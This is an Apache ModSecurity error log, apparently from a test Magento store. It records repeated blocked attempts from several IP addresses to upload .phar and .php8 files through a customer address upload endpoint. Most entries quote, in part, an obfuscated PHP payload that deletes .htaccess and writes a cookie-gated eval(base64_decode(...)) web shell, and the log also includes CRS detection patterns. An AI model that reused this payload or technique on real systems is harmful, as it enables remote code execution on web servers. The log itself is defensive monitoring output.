[Sun Dec 07 16:24:39.405721 2025] [:error] [pid 575101] [client 213.109.224.165:19769] [client 213.109.224.165] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/f/q/fq88364f428d25.phar"] [unique_id "aTWcN55-xCwpsqJ5xa2M5QAAAAo"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Dec 07 16:24:39.405917 2025] [:error] [pid 575101] [client 213.109.224.165:19769] [client 213.109.224.165] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/f/q/fq88364f428d25.phar"] [unique_id "aTWcN55-xCwpsqJ5xa2M5QAAAAo"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Dec 07 16:24:42.896251 2025] [:error] [pid 573221] [client 213.109.224.165:19593] [client 213.109.224.165] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: fq88364f428d25.php8 found within FILES:custom_attributes[country_id]: fq88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aTWcOlvgbiRUkefMDcypEAAAAAM"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/f/q/fq88364f428d25.phar
[Sun Dec 07 16:24:42.896965 2025] [:error] [pid 573221] [client 213.109.224.165:19593] [client 213.109.224.165] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aTWcOlvgbiRUkefMDcypEAAAAAM"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/f/q/fq88364f428d25.phar
[Sun Dec 07 16:24:42.897169 2025] [:error] [pid 573221] [client 213.109.224.165:19593] [client 213.109.224.165] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aTWcOlvgbiRUkefMDcypEAAAAAM"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/f/q/fq88364f428d25.phar
[Sun Dec 07 16:24:43.101912 2025] [:error] [pid 573221] [client 213.109.224.165:19593] [client 213.109.224.165] ModSecurity: Rule 7f9135098be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/f/q/fq88364f428d25.php8"] [unique_id "aTWcO1vgbiRUkefMDcypEQAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Dec 07 16:24:43.102420 2025] [:error] [pid 573221] [client 213.109.224.165:19593] [client 213.109.224.165] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/f/q/fq88364f428d25.php8"] [unique_id "aTWcO1vgbiRUkefMDcypEQAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Dec 07 16:24:43.104849 2025] [:error] [pid 573221] [client 213.109.224.165:19593] [client 213.109.224.165] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/f/q/fq88364f428d25.php8"] [unique_id "aTWcO1vgbiRUkefMDcypEQAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Dec 07 16:24:43.105050 2025] [:error] [pid 573221] [client 213.109.224.165:19593] [client 213.109.224.165] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/f/q/fq88364f428d25.php8"] [unique_id "aTWcO1vgbiRUkefMDcypEQAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Dec 08 09:45:37.408508 2025] [:error] [pid 595253] [client 146.103.119.117:37308] [client 146.103.119.117] ModSecurity: Rule 7f4f389a1be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/v/8/v888364f428d25.phar"] [unique_id "aTaQMQlbN3HvOuH6IPY77gAAAA0"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Dec 08 09:45:37.409191 2025] [:error] [pid 595253] [client 146.103.119.117:37308] [client 146.103.119.117] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/v/8/v888364f428d25.phar"] [unique_id "aTaQMQlbN3HvOuH6IPY77gAAAA0"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Dec 08 09:45:37.413047 2025] [:error] [pid 595253] [client 146.103.119.117:37308] [client 146.103.119.117] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/v/8/v888364f428d25.phar"] [unique_id "aTaQMQlbN3HvOuH6IPY77gAAAA0"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Dec 08 09:45:37.413326 2025] [:error] [pid 595253] [client 146.103.119.117:37308] [client 146.103.119.117] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/v/8/v888364f428d25.phar"] [unique_id "aTaQMQlbN3HvOuH6IPY77gAAAA0"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Dec 08 09:45:37.747965 2025] [:error] [pid 595253] [client 146.103.119.117:37308] [client 146.103.119.117] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: v888364f428d25.php8 found within FILES:custom_attributes[country_id]: v888364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aTaQMQlbN3HvOuH6IPY77wAAAA0"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/v/8/v888364f428d25.phar
[Mon Dec 08 09:45:37.748631 2025] [:error] [pid 595253] [client 146.103.119.117:37308] [client 146.103.119.117] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aTaQMQlbN3HvOuH6IPY77wAAAA0"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/v/8/v888364f428d25.phar
[Mon Dec 08 09:45:37.748815 2025] [:error] [pid 595253] [client 146.103.119.117:37308] [client 146.103.119.117] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aTaQMQlbN3HvOuH6IPY77wAAAA0"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/v/8/v888364f428d25.phar
[Mon Dec 08 09:45:38.080438 2025] [:error] [pid 595253] [client 146.103.119.117:37308] [client 146.103.119.117] ModSecurity: Rule 7f4f389a1be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/v/8/v888364f428d25.php8"] [unique_id "aTaQMglbN3HvOuH6IPY78AAAAA0"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Dec 08 09:45:38.080922 2025] [:error] [pid 595253] [client 146.103.119.117:37308] [client 146.103.119.117] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/v/8/v888364f428d25.php8"] [unique_id "aTaQMglbN3HvOuH6IPY78AAAAA0"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Dec 08 09:45:38.083379 2025] [:error] [pid 595253] [client 146.103.119.117:37308] [client 146.103.119.117] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/v/8/v888364f428d25.php8"] [unique_id "aTaQMglbN3HvOuH6IPY78AAAAA0"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Mon Dec 08 09:45:38.083566 2025] [:error] [pid 595253] [client 146.103.119.117:37308] [client 146.103.119.117] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/v/8/v888364f428d25.php8"] [unique_id "aTaQMglbN3HvOuH6IPY78AAAAA0"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 09 03:31:42.335112 2025] [:error] [pid 616663] [client 185.65.202.110:46188] [client 185.65.202.110] ModSecurity: Rule 7fc0e3b22be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/q/n/qn88364f428d25.phar"] [unique_id "aTeKDhk3NKbQ8i87INsc1wAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 09 03:31:42.335654 2025] [:error] [pid 616663] [client 185.65.202.110:46188] [client 185.65.202.110] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/q/n/qn88364f428d25.phar"] [unique_id "aTeKDhk3NKbQ8i87INsc1wAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 09 03:31:42.338262 2025] [:error] [pid 616663] [client 185.65.202.110:46188] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/q/n/qn88364f428d25.phar"] [unique_id "aTeKDhk3NKbQ8i87INsc1wAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 09 03:31:42.338562 2025] [:error] [pid 616663] [client 185.65.202.110:46188] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/q/n/qn88364f428d25.phar"] [unique_id "aTeKDhk3NKbQ8i87INsc1wAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 09 03:31:42.596276 2025] [:error] [pid 616663] [client 185.65.202.110:46188] [client 185.65.202.110] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: qn88364f428d25.php8 found within FILES:custom_attributes[country_id]: qn88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aTeKDhk3NKbQ8i87INsc2AAAAAI"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/q/n/qn88364f428d25.phar
[Tue Dec 09 03:31:42.596939 2025] [:error] [pid 616663] [client 185.65.202.110:46188] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aTeKDhk3NKbQ8i87INsc2AAAAAI"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/q/n/qn88364f428d25.phar
[Tue Dec 09 03:31:42.597113 2025] [:error] [pid 616663] [client 185.65.202.110:46188] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aTeKDhk3NKbQ8i87INsc2AAAAAI"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/q/n/qn88364f428d25.phar
[Tue Dec 09 03:31:42.876585 2025] [:error] [pid 616663] [client 185.65.202.110:46188] [client 185.65.202.110] ModSecurity: Rule 7fc0e3b22be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/q/n/qn88364f428d25.php8"] [unique_id "aTeKDhk3NKbQ8i87INsc2QAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 09 03:31:42.877099 2025] [:error] [pid 616663] [client 185.65.202.110:46188] [client 185.65.202.110] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/q/n/qn88364f428d25.php8"] [unique_id "aTeKDhk3NKbQ8i87INsc2QAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 09 03:31:42.879685 2025] [:error] [pid 616663] [client 185.65.202.110:46188] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/q/n/qn88364f428d25.php8"] [unique_id "aTeKDhk3NKbQ8i87INsc2QAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 09 03:31:42.879914 2025] [:error] [pid 616663] [client 185.65.202.110:46188] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/q/n/qn88364f428d25.php8"] [unique_id "aTeKDhk3NKbQ8i87INsc2QAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 09 21:09:12.603861 2025] [:error] [pid 616664] [client 185.65.202.110:51110] [client 185.65.202.110] ModSecurity: Rule 7fc0e3b22be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/a/9/a988364f428d25.phar"] [unique_id "aTiB6LA0yIwbR96rbbSc5gAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
